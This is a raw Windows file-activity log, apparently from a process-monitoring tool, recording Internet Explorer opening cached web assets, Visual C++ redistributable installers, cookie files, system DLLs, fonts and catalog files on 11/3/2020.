11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\VCREDIST_X86[1].EXE
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\vcredist_x64.exe
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\vcredist_x64.exe
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\vcredist_x86.exe
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\vcredist_x86.exe
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\2RMLHNN7.TXT
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\V1[1].HTM
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\style[1].css
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\style[1].cssstyle[1].css
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\bing-search-logo[1].png
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\bing-search-logo[1].pngbing-search-logo[1].png
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\4300ae64-546c-4bbe-9026-6779b3684fb8_32[1].png
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\4300ae64-546c-4bbe-9026-6779b3684fb8_32[1].png4300ae64-546c-4bbe-9026-6779b3684fb8_32[1].png
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\script[1].js
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\script[1].jsscript[1].js
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\click-run_pt-br[1].jpg
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\click-run_pt-br[1].jpgclick-run_pt-br[1].jpg
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\script[2].js
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\script[2].jsscript[2].js
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_592839A8569F831D0F2306AE4BB5C24B
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_592839A8569F831D0F2306AE4BB5C24BB398B80134F72209547439DB21AB308D_592839A8569F831D0F2306AE4BB5C24B
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_592839A8569F831D0F2306AE4BB5C24B
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_592839A8569F831D0F2306AE4BB5C24BB398B80134F72209547439DB21AB308D_592839A8569F831D0F2306AE4BB5C24B
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\1715500327[1].js
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\1715500327[1].js1715500327[1].js
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA734753452036BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA734753452036BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\jquery-1.8.3.min[1].js
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\jquery-1.8.3.min[1].jsjquery-1.8.3.min[1].js
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\DOMStore\SM4GL60W\www.microsoft[1].xml
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\DOMStore\SM4GL60W\www.microsoft[1].xmlwww.microsoft[1].xml
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\0A8EFV2Z.TXT
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\5DWWY1IU.TXT
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\0RSIIBM3.TXT
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\MYD0W1QU.TXT
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mfplat.dll
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mfplat.dll
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\avrt.dll
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\avrt.dll
11/3/2020 - 11:45:46.262Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\latest[1].eot
11/3/2020 - 11:45:46.262Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\latest[1].eotlatest[1].eot
11/3/2020 - 11:45:46.262Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\latest[2].eot
11/3/2020 - 11:45:46.262Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\latest[2].eotlatest[2].eot
11/3/2020 - 11:45:46.262Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mshtmlmedia.dll
11/3/2020 - 11:45:46.262Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mshtmlmedia.dllmshtmlmedia.dll
11/3/2020 - 11:45:46.262Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mf.dll
11/3/2020 - 11:45:46.262Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mf.dll
11/3/2020 - 11:45:46.262Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\atl.dll
11/3/2020 - 11:45:46.262Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\atl.dll
11/3/2020 - 11:45:46.262Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ksuser.dll
11/3/2020 - 11:45:46.262Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ksuser.dll
11/3/2020 - 11:45:46.262Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\t2embed.dll
11/3/2020 - 11:45:46.262Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\t2embed.dll
11/3/2020 - 11:45:46.262Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Fonts\seguisb.ttf
11/3/2020 - 11:45:46.262Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Fonts\seguisb.ttf
11/3/2020 - 11:45:46.262Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\latest[1].eot
11/3/2020 - 11:45:46.262Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\latest[1].eotlatest[1].eot
11/3/2020 - 11:45:46.262Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\search_icon[1].png
11/3/2020 - 11:45:46.262Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\search_icon[1].pngsearch_icon[1].png
11/3/2020 - 11:45:46.262Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Fonts\micross.ttf
11/3/2020 - 11:45:46.262Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Fonts\micross.ttf
11/3/2020 - 11:45:46.262Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\ie[1].png
11/3/2020 - 11:45:46.262Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\ie[1].pngie[1].png
11/3/2020 - 11:45:46.262Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\yellow-arrow[1].png
11/3/2020 - 11:45:46.262Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\yellow-arrow[1].pngyellow-arrow[1].png
11/3/2020 - 11:45:46.262Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\Bing[1].png
11/3/2020 - 11:45:46.262Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\Bing[1].pngBing[1].png
11/3/2020 - 11:45:46.262Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\windowsupdate[1].png
11/3/2020 - 11:45:46.262Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\windowsupdate[1].pngwindowsupdate[1].png
11/3/2020 - 11:45:46.262Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\35DDEDF268117918D1D277A171D8DF7B_F2DE72102A14736B534BAAAB62F0BD4B
11/3/2020 - 11:45:46.262Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\35DDEDF268117918D1D277A171D8DF7B_F2DE72102A14736B534BAAAB62F0BD4B35DDEDF268117918D1D277A171D8DF7B_F2DE72102A14736B534BAAAB62F0BD4B
11/3/2020 - 11:45:46.262Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\35DDEDF268117918D1D277A171D8DF7B_F2DE72102A14736B534BAAAB62F0BD4B
11/3/2020 - 11:45:46.262Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\35DDEDF268117918D1D277A171D8DF7B_F2DE72102A14736B534BAAAB62F0BD4B35DDEDF268117918D1D277A171D8DF7B_F2DE72102A14736B534BAAAB62F0BD4B
11/3/2020 - 11:45:46.262Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\LIKE[1].HTM
11/3/2020 - 11:45:46.262Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\xfLjhe25qYs[1].js
11/3/2020 - 11:45:46.262Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\xfLjhe25qYs[1].jsxfLjhe25qYs[1].js
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~cs-CZ~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~cs-CZ~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Shell-WinIP-Package~31bf3856ad364e35~amd64~uk-UA~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-Shell-WinIP-Package~31bf3856ad364e35~amd64~uk-UA~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Shell-WinIP-Package~31bf3856ad364e35~amd64~zh-CN~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-Shell-WinIP-Package~31bf3856ad364e35~amd64~zh-CN~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~ro-RO~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~ro-RO~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~th-TH~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~th-TH~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~nl-NL~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~nl-NL~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~pt-PT~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~pt-PT~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~sk-SK~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~sk-SK~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~sl-SI~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~sl-SI~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~et-EE~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~et-EE~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~hi-IN~7.1.7601.16492.catWin8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~hi-IN~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~he-IL~7.1.7601.16492.catWin8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~he-IL~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~el-GR~7.1.7601.16492.catWin8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~el-GR~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~uk-UA~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~uk-UA~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~hr-HR~7.1.7601.16492.catWin8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~hr-HR~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~zh-CN~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~zh-CN~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~lt-LT~7.1.7601.16492.catWin8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~lt-LT~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~zh-HK~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~zh-HK~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~cs-CZ~7.1.7601.16492.catWin8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~cs-CZ~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~zh-TW~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~zh-TW~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~da-DK~7.1.7601.16492.catWin8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~da-DK~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~sk-SK~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~sk-SK~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~da-DK~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~da-DK~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~ja-JP~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~ja-JP~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~pt-BR~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~pt-BR~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~hu-HU~7.1.7601.16492.catWin8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~hu-HU~7.1.7601.16492.cat
11/3/2020 - 11:45:46.262Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~lv-LV~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~lv-LV~7.1.7601.16492.cat
11/3/2020 - 11:45:46.278Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~ar-SA~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~ar-SA~7.1.7601.16492.cat
